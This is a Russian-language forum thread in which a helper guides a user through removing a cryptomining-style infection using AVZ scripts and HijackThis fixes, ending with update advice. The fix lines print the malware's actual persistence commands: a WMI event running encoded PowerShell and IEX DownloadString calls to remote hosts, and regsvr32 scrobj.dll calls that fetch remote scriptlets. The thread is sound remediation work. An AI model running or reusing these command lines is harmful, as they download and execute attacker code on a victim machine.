Решена mysa,mysa1,mysa2,mysa3,ok

Статус
В этой теме нельзя размещать новые ответы.

debufff

Новый пользователь
Сообщения
8
Реакции
0
Появились задания Mysa,Mysa1,Mysa2,Mysa3,ok в планировщике заданий когда удаляю появляются опять. Браузер при запуске открывает страницу about:blank хотя стоит новая вкладка. Сеть иногда просто пропадает. И при запуске пк через 2 минуты появляется на пол секунды cmd которая сворачивает приложения.
 

akok

Команда форума
Администратор
Ассоциация VN
Сообщения
20,767
Реакции
14,057
1. Скачайте утилиту на рабочий стол.
2. Запустите KVRT и подтвердите согласие с условиями использования
3. Дождитесь завершения инициализации и в открывшемся окне нажмите на кнопку "Изменить параметры"
4. В открывшемся меню, поставьте галочку напротив "Системный раздел" и нажмите "Ок"
5. Нажмите кнопку "Начать проверку" для начала сканирования и пролечите все найденое.
6. Дождитесь завершения сканирования и зайдите в папку C:\KVRT_Data\ (C:\ это обычно раздел, где установлена работающая версия Windows) и упакуйте папку Reports в архив и прикрепите к теме

А после нужны логи https://safezone.cc/pravila/
 

debufff

Новый пользователь
Сообщения
8
Реакции
0
Вроде это
 

Вложения

  • Reports.zip
    2.7 KB · Просмотры: 1
  • Addition.txt
    23.8 KB · Просмотры: 1
  • CollectionLog-2019.07.04-22.54.zip
    54.3 KB · Просмотры: 1
  • FRST.txt
    32.3 KB · Просмотры: 2

akok

Команда форума
Администратор
Ассоциация VN
Сообщения
20,767
Реакции
14,057
Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
Код:
  begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
  SearchRootkit(true, true);
  SetAVZGuardStatus(True);
  end;
 QuarantineFile('C:\Users\Серго\AppData\Local\Pupdbrowser\Pupdbrowser.exe','');
 QuarantineFile('c:\windows\update.exe>','');
 QuarantineFile('c:\windows\debug\item.dat','');
 QuarantineFile('c:\windows\debug\item.dat>','');
 QuarantineFile('c:\windows\help\lsmosee.exe>','');
 QuarantineFile('c:\windows\debug\ok.dat','');
 QuarantineFile('C:\Users\Серго\AppData\Roaming\nssm.exe','');
 DeleteFile('C:\Users\Серго\AppData\Roaming\nssm.exe','32');
 DeleteFile('c:\windows\debug\ok.dat','32');
 DeleteFile('c:\windows\help\lsmosee.exe>','32');
 DeleteFile('c:\windows\debug\item.dat>','32');
 DeleteFile('c:\windows\debug\item.dat','32');
 DeleteFile('c:\windows\update.exe>','32');
 DeleteFile('C:\Users\Серго\AppData\Local\Pupdbrowser\Pupdbrowser.exe','32');
 DeleteSchedulerTask('Pupdbrowser');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start','x32');
 RegKeyDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start','x32');
 DeleteSchedulerTask('Mysa');
 DeleteSchedulerTask('Mysa1');
 DeleteSchedulerTask('Mysa2');
 DeleteSchedulerTask('Mysa3');
 DeleteSchedulerTask('ok');
   BC_Activate;
  ExecuteSysClean;
  ExecuteWizard('SCU', 2, 3, true);
 BC_ImportALL;
RebootWindows(true);
end.
Компьютер перезагрузится.

После перезагрузки, выполните такой скрипт:

Код:
begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);
end.

Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма.

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код:
O25 - WMI Event: fuckyoumm4 - fuckyoumm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host/1.txt scrobj.dll&regsvr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll

Для повторной диагностики запустите снова AutoLogger. В первом диалоговом окне нажмите "ОК", удерживая нажатой клавишу "Shift".
 

debufff

Новый пользователь
Сообщения
8
Реакции
0
ошибка какая-то
Снимок.PNG
 

akok

Команда форума
Администратор
Ассоциация VN
Сообщения
20,767
Реакции
14,057
Используйте AVZ из папки автологера, а не устаревшую версию 4.46
 

debufff

Новый пользователь
Сообщения
8
Реакции
0
2019.10.17_quarantine_6736e374275c905c15846238569e4c23.7z
 

debufff

Новый пользователь
Сообщения
8
Реакции
0
вот, в HiJackThis О25 строки нет
 

Вложения

  • CollectionLog-2019.10.17-13.01.zip
    33 KB · Просмотры: 1

akok

Команда форума
Администратор
Ассоциация VN
Сообщения
20,767
Реакции
14,057
"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код:
O4 - MSConfig\startupreg: start [command] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.0603bye.info:280/v.sct scrobj.dll (HKLM) (2019/10/03)
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)


Что с проблемой после фикса?
 

debufff

Новый пользователь
Сообщения
8
Реакции
0
Вроде все нормально, спасибо за помощь
 

debufff

Новый пользователь
Сообщения
8
Реакции
0
вот
 

Вложения

  • SecurityCheck.txt
    8.6 KB · Просмотры: 5

akok

Команда форума
Администратор
Ассоциация VN
Сообщения
20,767
Реакции
14,057
Исправьте по возможности
Системный диск: C: ФС: [NTFS] Емкость: [37.3 Гб] Занято: [25.6 Гб] Свободно: [11.7 Гб]
------------------------------- [ Windows ] -------------------------------
Internet Explorer 8.0.7601.17514 Внимание! Скачать обновления
^Онлайн установка. Последняя версия доступна при включенном обновлении Windows через интернет.^
Контроль учётных записей пользователя отключен (Уровень 1)
^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^
Автоматическое обновление отключено
------------------------------- [ HotFix ] --------------------------------
HotFix KB3020369 Внимание! Скачать обновления
HotFix KB3125574 Внимание! Скачать обновления
HotFix KB4012212 Внимание! Скачать обновления
HotFix KB4499175 Внимание! Скачать обновления
HotFix KB4474419 Внимание! Скачать обновления
HotFix KB4490628 Внимание! Скачать обновления
HotFix KB4484071 Внимание! Скачать обновления
HotFix KB4512486 Внимание! Скачать обновления
HotFix KB4519976 Внимание! Скачать обновления
--------------------------- [ OtherUtilities ] ----------------------------
Microsoft .NET Framework 4.5.2 v.4.5.51209 Внимание! Скачать обновления
 

debufff

Новый пользователь
Сообщения
8
Реакции
0
Файл подкачки минимум какой выставить на диске С?
 

akok

Команда форума
Администратор
Ассоциация VN
Сообщения
20,767
Реакции
14,057
Оставьте размер по выбору системы, будет лучше.
 
Статус
В этой теме нельзя размещать новые ответы.
Сверху Снизу